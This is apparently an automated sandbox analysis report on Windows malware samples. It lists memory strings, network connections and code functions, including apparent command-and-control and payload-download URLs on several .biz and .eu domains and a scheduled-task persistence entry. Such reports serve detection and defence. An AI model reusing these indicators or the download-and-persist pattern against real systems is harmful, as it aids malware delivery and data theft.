                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                        Source: 0tClIDb.exe, 00000007.00000003.2540607901.00000000058C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: 0tClIDb.exe, 00000007.00000003.2540144728.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/
                        Source: 0tClIDb.exe, 00000007.00000003.2515717399.00000000058A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/J
                        Source: 0tClIDb.exe, 00000007.00000002.2679805098.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/Y
                        Source: 0tClIDb.exe, 0tClIDb.exe, 00000007.00000003.2588731287.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679422553.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2605626980.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2627785152.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679805098.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679970453.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api
                        Source: 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api2
                        Source: 0tClIDb.exe, 00000007.00000003.2588731287.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/api;
                        Source: 0tClIDb.exe, 00000007.00000003.2679422553.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679970453.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apidjd
                        Source: 0tClIDb.exe, 00000007.00000003.2679422553.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679970453.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/apiu(
                        Source: 0tClIDb.exe, 00000007.00000003.2491353787.0000000000C7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/g
                        Source: 0tClIDb.exe, 00000007.00000002.2679805098.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://atten-supporse.biz/z
                        Source: 0tClIDb.exe, 00000007.00000003.2542023162.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: 0tClIDb.exe, 00000007.00000003.2542023162.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                        Source: 0tClIDb.exe, 00000007.00000002.2686408044.0000000005890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu
                        Source: 0tClIDb.exe, 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678870606.000000000589A000.00000004.00000800.00020000.00000000.sdmp, 9DNEMG3H6COYF8VY.exe, 00000009.00000000.2678750378.0000000000722000.00000002.00000001.01000000.0000000A.sdmp, InternetDriver.exe.10.dr, NvidiaDriver.exe.9.dr, 9DNEMG3H6COYF8VY.exe.7.drString found in binary or memory: https://gamertool.eu/
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, NvidiaDriver.exe, 0000000A.00000002.2886812760.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002875000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/GmdDriver.exe
                        Source: 0tClIDb.exe, 0tClIDb.exe, 00000007.00000003.2679422553.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2678931983.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2679970453.0000000000C6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/LKSM.exe
                        Source: 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/LKSM.exe9G
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002894000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/get_file.php
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/get_updatT
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002CBC000.00000004.00000800.00020000.00000000.sdmp, NvidiaDriver.exe, 0000000A.00000002.2886812760.00000000028FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/get_update.php
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/receive.php
                        Source: 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/s
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/t
                        Source: 0tClIDb.exe, 00000007.00000003.2679176807.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2679265681.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000002.2680112997.0000000000C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gamertool.eu/v
                        Source: NvidiaDriver.exe, 0000000A.00000002.2886812760.0000000002CBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gamertool.euD
                        Source: 184f72cd859c47b29124ab7c76766326.exe.10.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                        Source: 0tClIDb.exe, 00000007.00000003.2542023162.0000000005891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                        Source: 0tClIDb.exe, 00000007.00000002.2686408044.0000000005890000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdva
                        Source: 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837425187.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se-blurry.biz/
                        Source: 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837555765.00000000014DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se-blurry.biz/9
                        Source: 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836935313.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014E8000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837579232.00000000014E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se-blurry.biz/api
                        Source: 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837425187.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se-blurry.biz/apin
                        Source: 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836534642.0000000001495000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000003.2836770077.00000000014DC000.00000004.00000020.00020000.00000000.sdmp, 184f72cd859c47b29124ab7c76766326.exe, 0000000D.00000002.2837555765.00000000014DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://se-blurry.biz/h
                        Source: 0tClIDb.exe, 00000007.00000003.2492403856.00000000058EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                        Source: 0tClIDb.exe, 00000007.00000003.2515793658.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2515650753.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492403856.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492460365.00000000058E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                        Source: 0tClIDb.exe, 00000007.00000003.2492460365.00000000058C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                        Source: 0tClIDb.exe, 00000007.00000003.2515793658.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2515650753.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492403856.00000000058EF000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2492460365.00000000058E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                        Source: 0tClIDb.exe, 00000007.00000003.2492460365.00000000058C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: 0tClIDb.exe, 00000007.00000003.2491707585.00000000058DC000.00000004.00000800.00020000.00000000.sdmp, 0tClIDb.exe, 00000007.00000003.2491793155.00000000058D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: 0tClIDb.exe, 00000007.00000003.2541679667.00000000059BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49782 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49788 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49795 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49802 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49810 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49819 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49826 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.4:49834 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.9.168:443 -> 192.168.2.4:49845 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.9.168:443 -> 192.168.2.4:49855 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.81.153:443 -> 192.168.2.4:49886 version: TLS 1.2

                        System Summary

                        barindex
                        Source: file.exeStatic PE information: section name:
                        Source: file.exeStatic PE information: section name: .idata
                        Source: skotes.exe.0.drStatic PE information: section name:
                        Source: skotes.exe.0.drStatic PE information: section name: .idata
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name:
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name: .idata
                        Source: 0tClIDb[1].exe.6.drStatic PE information: section name:
                        Source: 0tClIDb.exe.6.drStatic PE information: section name:
                        Source: 0tClIDb.exe.6.drStatic PE information: section name: .idata
                        Source: 0tClIDb.exe.6.drStatic PE information: section name:
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ADCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_00ADCB97
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D70490_2_004D7049
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D88600_2_004D8860
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D78BB0_2_004D78BB
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D31A80_2_004D31A8
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_005A7B6E0_2_005A7B6E
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00494B300_2_00494B30
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D2D100_2_004D2D10
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00494DE00_2_00494DE0
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004C7F360_2_004C7F36
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D779B0_2_004D779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B078BB1_2_00B078BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B088601_2_00B08860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B070491_2_00B07049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B031A81_2_00B031A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AC4B301_2_00AC4B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AC4DE01_2_00AC4DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B02D101_2_00B02D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00B0779B1_2_00B0779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00AF7F361_2_00AF7F36
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B078BB2_2_00B078BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B088602_2_00B08860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B070492_2_00B07049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B031A82_2_00B031A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AC4B302_2_00AC4B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AC4DE02_2_00AC4DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B02D102_2_00B02D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00B0779B2_2_00B0779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00AF7F362_2_00AF7F36
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ACE5306_2_00ACE530
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE61926_2_00AE6192
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B088606_2_00B08860
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC4B306_2_00AC4B30
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AC4DE06_2_00AC4DE0
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B02D106_2_00B02D10
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE0E136_2_00AE0E13
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B070496_2_00B07049
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B031A86_2_00B031A8
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE16026_2_00AE1602
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B0779B6_2_00B0779B
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00B078BB6_2_00B078BB
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AE3DF16_2_00AE3DF1
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00AF7F366_2_00AF7F36
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeCode function: 7_3_00C884D17_3_00C884D1
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 004A80C0 appears 130 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ADD64E appears 79 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00AD7A00 appears 38 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ADD942 appears 85 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ADD663 appears 40 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00ADDF80 appears 81 times
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: String function: 00AD80C0 appears 391 times
